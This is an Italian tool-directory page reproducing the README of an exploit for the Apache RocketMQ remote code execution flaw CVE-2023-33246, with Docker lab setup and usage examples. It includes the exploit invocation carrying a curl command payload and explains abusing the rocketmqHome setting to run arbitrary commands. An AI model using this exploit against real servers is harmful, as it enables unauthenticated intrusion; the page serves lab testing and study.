Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Apache-RocketMQ-CVE-2023-33246- — Exploit per Apache RocketMQ RCE (CVE-2023-33246) che esegue comandi arbitrari tramite la funzione di aggiornamento della configurazione, con configurazione dell'ambiente ed esempi di utilizzo. | Kitploit
Strumenti/GitHubGitHub/sumitpathania03/apache-rocketmq-cve-2023-33246-
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed TeamingArchived
GitHubsumitpathania03/apache-rocketmq-cve-2023-33246-

Apache-RocketMQ-CVE-2023-33246-

Exploit per Apache RocketMQ RCE (CVE-2023-33246) che esegue comandi arbitrari tramite la funzione di aggiornamento della configurazione, con configurazione dell'ambiente ed esempi di utilizzo.

Vedi Repository
12 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2023-33246: Esecuzione Remota di Codice in Apache RocketMQ

PANORAMICA

Apache RocketMQ è una delle piattaforme di messaggistica e streaming distribuite più popolari e ampiamente utilizzate. Recentemente è stata segnalata una vulnerabilità di esecuzione di comandi in Apache RocketMQ che interessa la versione 5.1.0 e precedenti. Un utente remoto non autenticato può sfruttare questa vulnerabilità utilizzando la funzione di aggiornamento della configurazione per eseguire comandi con lo stesso livello di accesso del processo utente di RocketMQ.

Componenti Essenziali

Nameserver:

  1. Il nameserver in RocketMQ funge da registro o archivio di metadati per l'intera infrastruttura di messaggistica.

  2. Mantiene informazioni su topic, code e i broker responsabili della gestione dei messaggi.

  3. I client (produttori e consumatori) utilizzano il nameserver per scoprire i broker con cui comunicare per pubblicare o consumare messaggi.

  4. Il nameserver è responsabile del routing dinamico, del bilanciamento del carico e del failover all'interno del cluster RocketMQ.

  5. Ascolta su una porta specifica (solitamente la porta 9876 di default) per le richieste in arrivo da client e broker.

Broker:

  1. I broker sono i cavalli di battaglia del sistema RocketMQ, responsabili dell'archiviazione e della gestione dei messaggi.

  2. Ogni broker gestisce uno o più topic, che sono canali logici per la comunicazione dei messaggi.

  3. I produttori pubblicano messaggi su topic specifici, e i consumatori si iscrivono ai topic per ricevere messaggi.

  4. I broker gestiscono l'archiviazione, la replica e la consegna dei messaggi ai consumatori in base alle sottoscrizioni e ai modelli di consumo dei messaggi.

  5. Mantengono code di messaggi per ogni partizione del topic, garantendo un'elaborazione e una consegna efficienti dei messaggi.

  6. I broker comunicano con i nameserver per registrarsi, aggiornare i metadati e partecipare ai meccanismi di routing e bilanciamento del carico del cluster.

Configurazione dell'Ambiente:-

Configura l'ambiente locale di RocketMQ tramite Docker

docker pull apache/rocketmq:4.9.4
### Start nameserver
docker run -d --name rmqnamesrv -p 9876:9876 apache/rocketmq:4.9.4 sh mqnamesrv
### Start Broker
docker run -d --name rmqbroker --link rmqnamesrv:namesrv -e "NAMESRV_ADDR=namesrv:9876" -p 10909:10909 -p 10911:10911 -p 10912:10912 apache/rocketmq:4.9.4 sh mqbroker -c /home/rocketmq/rocketmq-4.9.4/conf/broker.conf

Esempi di utilizzo

1. Controllo della Versione

Utilizzando la configurazione predefinita, il cluster Broker viene avviato sulla porta TCP 9876 per iniziare a ricevere messaggi da un client. Ad esempio, di seguito è mostrata una comunicazione di esempio tra un client e un broker per ottenere la versione di RocketMQ

python3 check.py --ip 127.0.0.1 --port 9876

rock

PCAP rock

2. Analisi dell'Exploit

La funzione UpdateBrokerConfig() viene attivata quando viene ricevuta una richiesta con codice '25', che è associato a RequestCode

python3 CVE-2023-33246_RocketMQ_RCE_EXPLOIT.py 127.0.0.1 10911 curl 127.0.0.1/exp

Screenshot 2024-03-28 164712

PCAP

rock

Utilizziamo la configurazione del server "rocketmqHome" presente nel file broker.conf. Questa configurazione imposta il valore della variabile d'ambiente ROCKETMQ_HOME all'interno del processo utente di RocketMQ. Attraverso un'attenta elaborazione di questo valore, possiamo eseguire comandi a nostra scelta.

rock

ecco come funziona questa vulnerabilità..

Scarica lo strumento